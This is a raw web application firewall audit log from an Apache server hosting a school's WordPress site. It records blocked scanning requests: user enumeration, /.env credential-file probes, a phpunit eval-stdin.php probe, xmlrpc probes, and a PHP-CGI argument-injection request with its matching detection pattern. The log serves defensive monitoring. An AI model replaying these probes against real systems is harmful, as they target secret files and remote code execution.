"COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747414813269498 3443 (- - -) Stopwatch2: 1747414813269498 3443; combined=1427, p1=474, p2=921, p3=0, p4=0, p5=31, sr=79, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --60ddeb20-Z-- --16151541-A-- [17/May/2025:00:07:06 +0700] aCdwuse47ocjCGWTS4Y93QAAAFc 103.236.140.4 50336 103.236.140.4 8181 --16151541-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 18.162.52.197 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 18.162.52.197 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --16151541-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --16151541-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747415226341161 3590 (- - -) Stopwatch2: 1747415226341161 3590; combined=1431, p1=483, p2=916, p3=0, p4=0, p5=32, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --16151541-Z-- --3ef60d70-A-- [17/May/2025:00:08:31 +0700] aCdxD8e47ocjCGWTS4Y94QAAAEU 103.236.140.4 50352 103.236.140.4 8181 --3ef60d70-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 103.133.107.28 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 103.133.107.28 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 Accept: */* --3ef60d70-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3ef60d70-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747415311746513 897 (- - -) Stopwatch2: 1747415311746513 897; combined=362, p1=305, p2=0, p3=0, p4=0, p5=56, sr=80, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3ef60d70-Z-- --f8ef7f67-A-- [17/May/2025:00:08:32 +0700] aCdxEMe47ocjCGWTS4Y94wAAAEc 103.236.140.4 50356 103.236.140.4 8181 --f8ef7f67-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 103.133.107.28 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 103.133.107.28 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 Accept: */* --f8ef7f67-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f8ef7f67-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747415312805927 880 (- - -) Stopwatch2: 1747415312805927 880; combined=364, p1=328, p2=0, p3=0, p4=0, p5=36, sr=100, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f8ef7f67-Z-- --95073f53-A-- [17/May/2025:00:19:04 +0700] aCdziEE0LfP59mkCzg40bAAAAMo 103.236.140.4 50420 103.236.140.4 8181 --95073f53-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 197.248.170.89 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 197.248.170.89 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --95073f53-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --95073f53-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747415944095993 2681 (- - -) Stopwatch2: 1747415944095993 2681; combined=1216, p1=406, p2=782, p3=0, p4=0, p5=28, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --95073f53-Z-- --7323881b-A-- [17/May/2025:00:25:21 +0700] aCd1Ace47ocjCGWTS4Y97gAAAEI 103.236.140.4 50460 103.236.140.4 8181 --7323881b-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 213.77.99.142 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 213.77.99.142 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --7323881b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7323881b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747416321663510 2811 (- - -) Stopwatch2: 1747416321663510 2811; combined=1474, p1=441, p2=983, p3=0, p4=0, p5=49, sr=74, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7323881b-Z-- --a50bc73b-A-- [17/May/2025:00:40:22 +0700] aCd4hthEtho3ciA0wehcwAAAAIU 103.236.140.4 52274 103.236.140.4 8181 --a50bc73b-B-- POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 79.124.58.198 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 79.124.58.198 X-Forwarded-Proto: https Connection: close Content-Length: 19 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Type: application/x-www-form-urlencoded --a50bc73b-C-- --a50bc73b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a50bc73b-H-- Message: Access denied with code 403 (phase 2). String match " demo.sayHello --0d859661-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --0d859661-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747418124949232 6162 (- - -) Stopwatch2: 1747418124949232 6162; combined=4406, p1=619, p2=3544, p3=34, p4=36, p5=101, sr=80, sw=72, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0d859661-Z-- --461bfd19-A-- [17/May/2025:00:58:01 +0700] aCd8qce47ocjCGWTS4Y-nwAAAEg 103.236.140.4 52744 103.236.140.4 8181 --461bfd19-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 199.68.177.41 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 199.68.177.41 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --461bfd19-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --461bfd19-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747418281277161 2888 (- - -) Stopwatch2: 1747418281277161 2888; combined=1301, p1=435, p2=835, p3=0, p4=0, p5=31, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --461bfd19-Z-- --e73e4d10-A-- [17/May/2025:01:07:09 +0700] aCd-zde6THFz1hsaJaLY4QAAABc 103.236.140.4 53098 103.236.140.4 8181 --e73e4d10-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 209.146.63.30 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 209.146.63.30 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --e73e4d10-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e73e4d10-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747418829564709 3101 (- - -) Stopwatch2: 1747418829564709 3101; combined=1330, p1=430, p2=870, p3=0, p4=0, p5=30, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e73e4d10-Z-- --bed0d907-A-- [17/May/2025:01:30:01 +0700] aCeEKde6THFz1hsaJaLY7wAAAAM 103.236.140.4 53344 103.236.140.4 8181 --bed0d907-B-- POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 94.156.115.59 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 94.156.115.59 X-Forwarded-Proto: https Connection: close Content-Length: 221 Accept: */* Upgrade-Insecure-Requests: 1 User-Agent: Custom-AsyncHttpClient Content-Type: application/x-www-form-urlencoded --bed0d907-C-- --bed0d907-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bed0d907-E-- --bed0d907-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747420201901230 3968 (- - -) Stopwatch2: 1747420201901230 3968; combined=2780, p1=366, p2=2392, p3=0, p4=0, p5=21, sr=51, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bed0d907-Z-- --acaf9c57-A-- [17/May/2025:01:32:35 +0700] aCeEw8e47ocjCGWTS4Y-wgAAAEY 103.236.140.4 53432 103.236.140.4 8181 --acaf9c57-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.43.232 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.43.232 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --acaf9c57-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --acaf9c57-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747420355470112 14900 (- - -) Stopwatch2: 1747420355470112 14900; combined=25652, p1=411, p2=717, p3=0, p4=0, p5=12276, sr=72, sw=1, l=0, gc=12247 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --acaf9c57-Z-- --dadbe553-A-- [17/May/2025:01:32:42 +0700] aCeEyse47ocjCGWTS4Y-xAAAAEk 103.236.140.4 53436 103.236.140.4 8181 --dadbe553-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.43.232 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.43.232 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --dadbe553-C-- demo.sayHello --dadbe553-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --dadbe553-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747420362336490 6210 (- - -) Stopwatch2: 1747420362336490 6210; combined=4796, p1=543, p2=3661, p3=32, p4=35, p5=276, sr=77, sw=249, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dadbe553-Z-- --69ecb22a-A-- [17/May/2025:01:52:34 +0700] aCeJcthEtho3ciA0wehdKgAAAJg 103.236.140.4 53544 103.236.140.4 8181 --69ecb22a-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 117.196.223.138 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 117.196.223.138 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --69ecb22a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --69ecb22a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747421554643885 2656 (- - -) Stopwatch2: 1747421554643885 2656; combined=1241, p1=417, p2=796, p3=0, p4=0, p5=28, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --69ecb22a-Z-- --f743675d-A-- [17/May/2025:02:01:07 +0700] aCeLc9hEtho3ciA0wehdNQAAAIw 103.236.140.4 53576 103.236.140.4 8181 --f743675d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.249.63.228 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.63.228 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --f743675d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f743675d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747422067001192 3381 (- - -) Stopwatch2: 1747422067001192 3381; combined=1497, p1=482, p2=919, p3=0, p4=0, p5=95, sr=77, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f743675d-Z-- --df2f0518-A-- [17/May/2025:02:01:14 +0700] aCeLethEtho3ciA0wehdOAAAAJQ 103.236.140.4 53582 103.236.140.4 8181 --df2f0518-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.63.228 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.63.228 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --df2f0518-C-- demo.sayHello --df2f0518-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --df2f0518-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747422074408098 5940 (- - -) Stopwatch2: 1747422074408098 5940; combined=4353, p1=655, p2=3528, p3=21, p4=23, p5=73, sr=158, sw=53, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --df2f0518-Z-- --4015c03d-A-- [17/May/2025:02:01:56 +0700] aCeLpMe47ocjCGWTS4Y-2AAAAFY 103.236.140.4 53592 103.236.140.4 8181 --4015c03d-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 103.139.45.163 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 103.139.45.163 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 Accept: */* --4015c03d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4015c03d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747422116875338 830 (- - -) Stopwatch2: 1747422116875338 830; combined=322, p1=276, p2=0, p3=0, p4=0, p5=46, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4015c03d-Z-- --d98aec12-A-- [17/May/2025:02:01:57 +0700] aCeLpdhEtho3ciA0wehdPAAAAIA 103.236.140.4 53596 103.236.140.4 8181 --d98aec12-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 103.139.45.163 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 103.139.45.163 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 Accept: */* --d98aec12-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d98aec12-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747422117434593 871 (- - -) Stopwatch2: 1747422117434593 871; combined=347, p1=301, p2=0, p3=0, p4=0, p5=46, sr=91, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d98aec12-Z-- --5741c62f-A-- [17/May/2025:02:02:19 +0700] aCeLu9hEtho3ciA0wehdPwAAAIk 103.236.140.4 53610 103.236.140.4 8181 --5741c62f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.91.128 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.91.128 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --5741c62f-C-- demo.sayHello --5741c62f-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --5741c62f-H-- Message: Warning. Match of "pmFromFile 